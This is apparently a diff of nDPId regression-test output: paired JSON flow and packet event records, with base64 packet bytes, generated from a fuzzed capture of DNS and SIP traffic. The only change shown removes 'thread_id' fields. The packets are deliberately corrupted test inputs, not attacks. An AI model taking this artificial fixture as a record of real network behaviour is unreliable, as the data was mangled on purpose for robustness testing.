00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470798172,"flow_last_seen":1120470806184,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470798172,"flow_last_seen":1120470806184,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470993243,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -1240,19 +1240,19 @@
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1120471001245,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120471001245,"pkt":"ADBUADRWAODtAW69CABFAABEbDoAAIARSxvAqAECwKgBAQsGADUAMBixDAgAAAABEAAAAAAAATEBMAEwAzHvNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1120471001245,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120471001245,"pkt":"ADBUADRWAODtAW69CABFAABEbDoAAIARSxvAqAECwKgBAQsGADUAMBixDAgAAAABEAAAAAAAATEBMAEwAzHvNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.1?7.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471001245,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.1?7.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00439{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":638,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120471001245,"pkt":"AODtAW4lcwBUADRWCABFqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":638,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120471001245,"pkt":"AODtAW4lcwBUADRWCABFqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":638,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120471001246} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":638,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120471001246}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1120471001263,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1120471001263,"pkt":"ADBUADRWAODtAW69CABFAAHsbDsAAIARFQbAqAEC1OohIxPEE8QB2K3LUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wODg4NjAxNi00NGIxNGZlMzE5Mi4xNjguMS4yO3Jwb3J0DQpGcm9tOiA8c2lwOjM1MTA0NzIzQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz04Nzk3MWENClRvOiA8c2lwOjM1MTA0NzIzQHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlEOiAyOTg1ODFHNy00NjViMDc1MkAyOTg1ODA1MS00NjViMDdiMnMKQ29udGFjdDogcGVsIDxzaXA6MzUxMDQ3MjNAMTkyLjE2OC4xLjI6NTA2MDtsaW5lPTdkMzY1NThmMzEzNjcwNTE+O2V4cGlyZXM9MTIwMDtxBDAuNTAwDQpFeHBpcmVzOiAxMjAwDQpDU2VxOiA1IFJFR0lTVEVSDQpD\/G50ZW50LUxlbmd0aDogMA0KTWF4LUZvcndhYmRzOiA3MA0KVXNlci1BZ2VudDoiTmVybyBTSVBQUyBJUCBQaG9uZSBWZXJzaW9uIDIuOC41MS4xNg0KDQo="} 01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1120471001263,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1120471001263,"pkt":"ADBUADRWAODtAW69CABFAAHsbDsAAIARFQbAqAEC1OohIxPEE8QB2K3LUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wODg4NjAxNi00NGIxNGZlMzE5Mi4xNjguMS4yO3Jwb3J0DQpGcm9tOiA8c2lwOjM1MTA0NzIzQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz04Nzk3MWENClRvOiA8c2lwOjM1MTA0NzIzQHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlEOiAyOTg1ODFHNy00NjViMDc1MkAyOTg1ODA1MS00NjViMDdiMnMKQ29udGFjdDogcGVsIDxzaXA6MzUxMDQ3MjNAMTkyLjE2OC4xLjI6NTA2MDtsaW5lPTdkMzY1NThmMzEzNjcwNTE+O2V4cGlyZXM9MTIwMDtxBDAuNTAwDQpFeHBpcmVzOiAxMjAwDQpDU2VxOiA1IFJFR0lTVEVSDQpD\/G50ZW50LUxlbmd0aDogMA0KTWF4LUZvcndhYmRzOiA3MA0KVXNlci1BZ2VudDoiTmVybyBTSVBQUyBJUCBQaG9uZSBWZXJzaW9uIDIuOC41MS4xNg0KDQo="}
00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":639,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471001263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
00995{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":640,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":522,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":522,"pkt_l4_len":0,"thread_ts_msec":1120471001263,"pkt":"AODtAW69ADBUADRWCABFAEH8AABAADcRijHU8iEjwKgBAhPEE8QB6DHXU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiAyOTg1ODE0N4M0NjViMDc1MkAyMTg1ODA1MS00NjViMDdiMg0KQ1MxcTogNSBSRUdJU1RFXw0KRnJvbTogWnNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9ODc5NzFhDQpUbzpqPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MDAtMDQwNzQtMTcwMWJhYzktMWRhYTBiNGM1DQpWaWE6IFNJJXMALjAvVURQIDE5Mi4xNjguMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTkuNzA7cnBvcnQ9NTA2MDticmFuY2g9ejloRzRiS25wODg4NjAxNi00NGIxNGZlMzE5Mi4xNjguMS4yDQpXV1ctQXV0aGVudGljYXRlOiBEaWdlc3QgcmVhbG09InNpcC5jeWJlcmNpdHkuZGsiLG5vbmNlPSIxNzAxYmFiZDJhZDY3JXMANWU2ZDZiZjE1NDQyYSVzACxvcGFxdWU9IjE3MDFhMTM1MWY3MDc5NSIsc3RhbGU9ZmFsc2UsYWxnb3JpdGhtPU1ENQ0KQ29udGVuLy1MZW5ndGg6IDANCg0K"} 00981{"packet_event_id":1,"packet_event_name":"packet","packet_id":640,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":522,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":522,"pkt_l4_len":0,"thread_ts_msec":1120471001263,"pkt":"AODtAW69ADBUADRWCABFAEH8AABAADcRijHU8iEjwKgBAhPEE8QB6DHXU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiAyOTg1ODE0N4M0NjViMDc1MkAyMTg1ODA1MS00NjViMDdiMg0KQ1MxcTogNSBSRUdJU1RFXw0KRnJvbTogWnNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9ODc5NzFhDQpUbzpqPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MDAtMDQwNzQtMTcwMWJhYzktMWRhYTBiNGM1DQpWaWE6IFNJJXMALjAvVURQIDE5Mi4xNjguMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTkuNzA7cnBvcnQ9NTA2MDticmFuY2g9ejloRzRiS25wODg4NjAxNi00NGIxNGZlMzE5Mi4xNjguMS4yDQpXV1ctQXV0aGVudGljYXRlOiBEaWdlc3QgcmVhbG09InNpcC5jeWJlcmNpdHkuZGsiLG5vbmNlPSIxNzAxYmFiZDJhZDY3JXMANWU2ZDZiZjE1NDQyYSVzACxvcGFxdWU9IjE3MDFhMTM1MWY3MDc5NSIsc3RhbGU9ZmFsc2UsYWxnb3JpdGhtPU1ENQ0KQ29udGVuLy1MZW5ndGg6IDANCg0K"}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":640,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":488,"global_ts_msec":1120471001405} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":640,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":488,"global_ts_msec":1120471001405}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001714,"flow_last_seen":1120471001714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471001714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001714,"flow_last_seen":1120471001714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471001714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1120471001714,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471001714,"pkt":"ADBUADRWAODtAW69CABFAABIbDwAAIARSxXAqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1120471001714,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471001714,"pkt":"ADBUADRWAODtAW69CABFAABIbDwAAIARSxXAqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001714,"flow_last_seen":1120471001714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471001714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001714,"flow_last_seen":1120471001714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471001714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1120471002706,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471002706,"pkt":"ADBUADRWAODtAW69CABFAABIbD8gAIARSxTAqAECwKgBAQsHADUANKe0gjgBAAABAAAAAAAABF9zaXAEXXVkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1120471002706,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471002706,"pkt":"ADBUADRWAODtAW69CABFAABIbD8gAIARSxTAqAECwKgBAQsHADUANKe0gjgBAAABAAAAAAAABF9zaXAEXXVkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":643,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471002706,"pkt":"ALlUADRWAODtAW69CABFAABIbD4Au4ARSxNYqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":643,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471002706,"pkt":"ALlUADRWAODtAW69CABFAABIbD4Au4ARSxNYqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":643,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120471004709} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":643,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120471004709}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":1120471006712,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471006712,"pkt":"ADBUADRWAODtAW69CABFAABIbEcAAIARSwrAqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAApAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":1120471006712,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471006712,"pkt":"ADBUADRWAODtAW69CABFAABIbEcAAIARSwrAqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAApAAE="}
00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":644,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120471001714,"flow_last_seen":1120471006712,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471006712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":41,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":644,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120471001714,"flow_last_seen":1120471006712,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471006712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":41,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471001714,"flow_last_seen":1120471010718,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 